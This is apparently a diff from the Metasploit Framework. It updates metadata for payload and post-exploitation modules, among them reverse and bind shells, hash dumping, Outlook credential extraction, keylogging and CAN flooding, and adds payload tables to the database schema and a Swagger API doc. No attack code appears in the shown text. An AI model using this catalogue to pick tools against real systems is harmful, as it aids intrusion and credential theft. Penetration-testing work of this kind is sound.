+    "mod_time": "2019-04-26 08:40:07 +0000",
    "path": "/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell_bind_tcp",
@@ -125963,7 +128395,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-04-26 08:40:07 +0000",
    "path": "/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell_reverse_tcp",
@@ -126647,7 +129079,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_http",
@@ -126678,7 +129110,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_https",
@@ -126709,7 +129141,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_tcp",
@@ -126798,7 +129230,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_http",
@@ -126829,7 +129261,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_https",
@@ -126860,7 +129292,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_tcp",
@@ -127039,7 +129471,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_http",
@@ -127070,7 +129502,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_https",
@@ -127101,7 +129533,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_tcp",
@@ -127190,7 +129622,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-08-21 12:25:27 +0000",
+    "mod_time": "2019-05-25 17:51:30 +0000",
    "path": "/modules/payloads/singles/linux/armle/shell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/shell_bind_tcp",
@@ -127250,7 +129682,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_http",
@@ -127281,7 +129713,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_https",
@@ -127312,7 +129744,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_tcp",
@@ -127404,7 +129836,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_http",
@@ -127435,7 +129867,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_https",
@@ -127466,7 +129898,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_tcp",
@@ -127680,7 +130112,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_http",
@@ -127711,7 +130143,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_https",
@@ -127742,7 +130174,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_tcp",
@@ -127895,7 +130327,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_http",
@@ -127926,7 +130358,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_https",
@@ -127957,7 +130389,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_tcp",
@@ -128162,7 +130594,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_http",
@@ -128193,7 +130625,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_https",
@@ -128224,7 +130656,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_tcp",
@@ -128255,7 +130687,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_http",
@@ -128286,7 +130718,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_https",
@@ -128317,7 +130749,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_tcp",
@@ -128438,7 +130870,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_http",
@@ -128469,7 +130901,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_https",
@@ -128500,7 +130932,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_tcp",
@@ -129163,7 +131595,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_http",
@@ -129194,7 +131626,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_https",
@@ -129225,7 +131657,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_tcp",
@@ -129690,11 +132122,13 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "Geyslan G. Bem <geyslan@gmail.com>"
+      "Geyslan G. Bem <geyslan@gmail.com>",
+      "Aleh Boitsau <infosecurity@ya.ru>"
    ],
    "description": "Listen for a connection in a random port and spawn a command shell.\n        Use nmap to discover the open port: 'nmap -sS target -p-'.",
    "references": [
-
+      "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm",
+      "EDB-41631"
    ],
    "platform": "Linux",
    "arch": "x86",
@@ -129702,7 +132136,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-05-01 04:57:42 +0000",
+    "mod_time": "2019-05-17 03:12:01 +0000",
    "path": "/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/shell_bind_tcp_random_port",
@@ -129850,7 +132284,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_http",
@@ -129881,7 +132315,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_https",
@@ -129912,7 +132346,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_tcp",
@@ -130652,7 +133086,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-31 09:32:44 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_http",
@@ -130683,7 +133117,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-31 09:32:44 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_https",
@@ -130714,7 +133148,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-31 00:12:45 +0000",
+    "mod_time": "2019-05-31 09:32:44 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_tcp",
@@ -135952,7 +138386,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-07-19 17:58:45 +0000",
+    "mod_time": "2019-04-26 08:40:07 +0000",
    "path": "/modules/payloads/singles/windows/powershell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/powershell_bind_tcp",
@@ -135984,7 +138418,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-07-19 17:58:45 +0000",
+    "mod_time": "2019-04-26 08:40:07 +0000",
    "path": "/modules/payloads/singles/windows/powershell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/powershell_reverse_tcp",
@@ -138919,7 +141353,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-07-19 17:58:45 +0000",
+    "mod_time": "2019-04-26 08:40:07 +0000",
    "path": "/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/powershell_bind_tcp",
@@ -138950,7 +141384,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-07-19 17:58:45 +0000",
+    "mod_time": "2019-04-26 08:40:07 +0000",
    "path": "/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/powershell_reverse_tcp",
@@ -140044,6 +142478,35 @@
    "notes": {
    }
  },
+  "post_hardware/automotive/can_flood": {
+    "name": "CAN Flood",
+    "full_name": "post/hardware/automotive/can_flood",
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Pietro Biondi"
+    ],
+    "description": "This module floods a CAN interface with supplied frames.",
+    "references": [
+
+    ],
+    "platform": "Hardware",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-04-01 12:04:31 +0000",
+    "path": "/modules/post/hardware/automotive/can_flood.rb",
+    "is_install_path": true,
+    "ref_name": "hardware/automotive/can_flood",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "post_hardware/automotive/canprobe": {
    "name": "Module to Probe Different Data Points in a CAN Packet",
    "full_name": "post/hardware/automotive/canprobe",
@@ -140971,7 +143434,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-30 20:16:08 +0000",
+    "mod_time": "2019-03-23 14:02:34 +0000",
    "path": "/modules/post/linux/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/hashdump",
@@ -141942,7 +144405,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-09-10 15:25:09 +0000",
+    "mod_time": "2019-05-16 19:31:11 +0000",
    "path": "/modules/post/multi/gather/jenkins_gather.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/jenkins_gather",
@@ -142420,6 +144883,40 @@
    "notes": {
    }
  },
+  "post_multi/gather/ubiquiti_unifi_backup": {
+    "name": "Multi Gather Ubiquiti UniFi Controller Backup",
+    "full_name": "post/multi/gather/ubiquiti_unifi_backup",
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "h00die",
+      "zhangyoufu",
+      "justingist"
+    ],
+    "description": "On an Ubiquiti UniFi controller, reads the system.properties configuration file\n        and downloads the backup and autobackup files.  The files are then decrypted using\n        a known encryption key, then attempted to be repaired by zip.  Meterpreter must be\n        used due to the large file sizes, which can be flaky on regular shells to read.\n        Confirmed to work on 5.10.19 - 5.10.23, but most likely quite a bit more.",
+    "references": [
+      "URL-https://github.com/zhangyoufu/unifi-backup-decrypt/",
+      "URL-https://github.com/justingist/POSH-Ubiquiti/blob/master/Posh-UBNT.psm1",
+      "URL-https://help.ubnt.com/hc/en-us/articles/205202580-UniFi-system-properties-File-Explanation",
+      "URL-https://community.ubnt.com/t5/UniFi-Wireless/unf-controller-backup-file-format/td-p/1624105"
+    ],
+    "platform": "Linux,OSX,Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-05-14 15:54:44 +0000",
+    "path": "/modules/post/multi/gather/ubiquiti_unifi_backup.rb",
+    "is_install_path": true,
+    "ref_name": "multi/gather/ubiquiti_unifi_backup",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "post_multi/gather/wlan_geolocate": {
    "name": "Multiplatform WLAN Enumeration and Geolocation",
    "full_name": "post/multi/gather/wlan_geolocate",
@@ -142725,13 +145222,13 @@
    "references": [

    ],
-    "platform": "Android,Linux,OSX,Windows",
+    "platform": "Android,Linux,OSX,Unix,Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-10-23 10:13:44 +0000",
+    "mod_time": "2019-06-02 11:31:43 +0000",
    "path": "/modules/post/multi/manage/play_youtube.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/play_youtube",
@@ -142993,7 +145490,7 @@
    "references": [

    ],
-    "platform": "AIX,Android,Apple_iOS,BSD,BSDi,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unix,Unknown,Windows",
+    "platform": "AIX,Android,Apple_iOS,BSD,BSDi,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unifi,Unix,Unknown,Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
@@ -143115,7 +145612,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-04-28 15:56:56 +0000",
+    "mod_time": "2019-04-15 21:01:05 +0000",
    "path": "/modules/post/osx/capture/keylog_recorder.rb",
    "is_install_path": true,
    "ref_name": "osx/capture/keylog_recorder",
@@ -143398,7 +145895,7 @@
    "author": [
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "This module gathers basic system information from Mac OS X Tiger, Leopard,\n          Snow Leopard and Lion systems.",
+    "description": "This module gathers basic system information from Mac OS X Tiger (10.4), through\n            Mojave (10.14).",
    "references": [

    ],
@@ -143408,7 +145905,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-05-22 22:25:39 +0000",
+    "mod_time": "2019-04-15 21:01:05 +0000",
    "path": "/modules/post/osx/gather/enum_osx.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/enum_osx",
@@ -143429,7 +145926,7 @@
      "hammackj <jacob.hammack@hammackj.com>",
      "joev <joev@metasploit.com>"
    ],
-    "description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports\n            versions 10.3 to 10.9.",
+    "description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports\n            versions 10.3 to 10.14.",
    "references": [

    ],
@@ -143439,7 +145936,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-30 20:16:08 +0000",
+    "mod_time": "2019-05-30 18:33:45 +0000",
    "path": "/modules/post/osx/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/hashdump",
@@ -143470,7 +145967,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-04-24 05:06:20 +0000",
    "path": "/modules/post/osx/gather/password_prompt_spoof.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/password_prompt_spoof",
@@ -143826,7 +146323,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-30 20:16:08 +0000",
+    "mod_time": "2019-03-24 08:11:24 +0000",
    "path": "/modules/post/solaris/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "solaris/gather/hashdump",
@@ -145044,7 +147541,7 @@
    "author": [
      "Justin Cacak"
    ],
-    "description": "This module extracts and decrypts saved Microsoft\n          Outlook (versions 2002-2010) passwords from the Windows\n          Registry for POP3/IMAP/SMTP/HTTP accounts.\n          In order for decryption to be successful, this module must be\n          executed under the same privileges as the user which originally\n          encrypted the password.",
+    "description": "This module extracts and decrypts saved Microsoft\n        Outlook (versions 2002-2010) passwords from the Windows\n        Registry for POP3/IMAP/SMTP/HTTP accounts.\n        In order for decryption to be successful, this module must be\n        executed under the same privileges as the user which originally\n        encrypted the password.",
    "references": [

    ],
@@ -145054,7 +147551,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-24 19:11:22 +0000",
    "path": "/modules/post/windows/gather/credentials/outlook.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/outlook",
@@ -145384,7 +147881,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-31 17:44:35 +0000",
    "path": "/modules/post/windows/gather/credentials/tortoisesvn.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/tortoisesvn",
@@ -148296,7 +150793,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-03-26 17:46:18 +0000",
+    "mod_time": "2019-05-31 17:44:35 +0000",
    "path": "/modules/post/windows/manage/persistence_exe.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/persistence_exe",
@@ -148354,7 +150851,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-09-27 07:41:06 +0000",
+    "mod_time": "2019-05-31 17:44:35 +0000",
    "path": "/modules/post/windows/manage/powershell/build_net_code.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/powershell/build_net_code",
@@ -11,7 +11,7 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema.define(version: 20161227212223) do
+ActiveRecord::Schema.define(version: 20190507120211) do

  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"
@@ -22,6 +22,17 @@ ActiveRecord::Schema.define(version: 20161227212223) do
    t.datetime "updated_at", null: false
  end

+  create_table "async_callbacks", force: :cascade do |t|
+    t.string   "uuid",           null: false
+    t.integer  "timestamp",      null: false
+    t.string   "listener_uri"
+    t.string   "target_host"
+    t.string   "target_port"
+    t.datetime "created_at",     null: false
+    t.datetime "updated_at",     null: false
+    t.uuid     "{:null=>false}"
+  end
+
  create_table "automatic_exploitation_match_results", force: :cascade do |t|
    t.integer  "match_id"
    t.integer  "run_id"
@@ -475,6 +486,23 @@ ActiveRecord::Schema.define(version: 20161227212223) do
  add_index "notes", ["ntype"], name: "index_notes_on_ntype", using: :btree
  add_index "notes", ["vuln_id"], name: "index_notes_on_vuln_id", using: :btree

+  create_table "payloads", force: :cascade do |t|
+    t.string   "name"
+    t.string   "uuid"
+    t.integer  "uuid_mask"
+    t.integer  "timestamp"
+    t.string   "arch"
+    t.string   "platform"
+    t.string   "urls"
+    t.string   "description"
+    t.string   "raw_payload"
+    t.string   "raw_payload_hash"
+    t.string   "build_status"
+    t.string   "build_opts"
+    t.datetime "created_at",       null: false
+    t.datetime "updated_at",       null: false
+  end
+
  create_table "profiles", force: :cascade do |t|
    t.datetime "created_at",                null: false
    t.datetime "updated_at",                null: false
@@ -0,0 +1,242 @@
+require 'swagger/blocks'
+
+module PayloadApiDoc
+  include Swagger::Blocks
+
+  NAME_DESC = 'A name for the payload.'
+  UUID_DESC = 'A payload\'s unique identifier.'
+  UUID_EXAMPLE = '6dde5ce0e94c9f43'
+  TIMESTAMP_DESC = 'The Unix format timestamp when this payload was created.'
+  TIMESTAMP_EXAMPLE = '1536777407'
+  ARCH_DESC = 'The architecture this payload supports.'
+  ARCH_EXAMPLE = 'x86'
+  PLATFORM_DESC = 'The platform this payload supports.'
+  PLATFORM_EXAMPLE = 'windows'
+  URLS_DESC = 'The unique, encoded urls used to host this payload. Only applicable for http(s) payloads.'
+  URLS_EXAMPLE = ['/bd5c4OlMn0OeQp9AxdvC_Q2EIcdSRvg7gzLdQwU__Mb1WtjGR8C4UbjohhRIgbmBfFFBsNJ-wZMyFZKK33aorc8qfD0xCsmxSEyHaiyjGn0ykbJOlYFF1j1HXShiKiiwbfh_wPf2uqSWk2tnaLAqwuvxPcRuDPF-kdkmDDC2']
+  DESCRIPTION_DESC = 'A description of why this payload was created and what it is being used for.'
+  WORKSPACE_ID_DESC = 'The ID of the workspace this payload belongs to.'
+  WORKSPACE_ID_EXAMPLE = 1
+  RAW_PAYLOAD_DESC = 'A URL pointing to where the binary payload can be downloaded from.'
+  RAW_PAYLOAD_HASH_DESC = 'The unique hash value for the generated payload binary.'
+  BUILD_OPTS_DESC = 'A hash containing various options used to build this payload.'
+
+# Swagger documentation for payloads model
+  swagger_schema :Payload do
+    key :required, [:ntype]
+    property :workspace, type: :string, required: true, description: RootApiDoc::WORKSPACE_POST_EXAMPLE
+    property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
+    property :name, type: :string, description: NAME_DESC
+    property :uuid, type: :string, description: UUID_DESC, example: UUID_EXAMPLE
+    property :timestamp, type: :integer, description: TIMESTAMP_DESC, example: TIMESTAMP_EXAMPLE
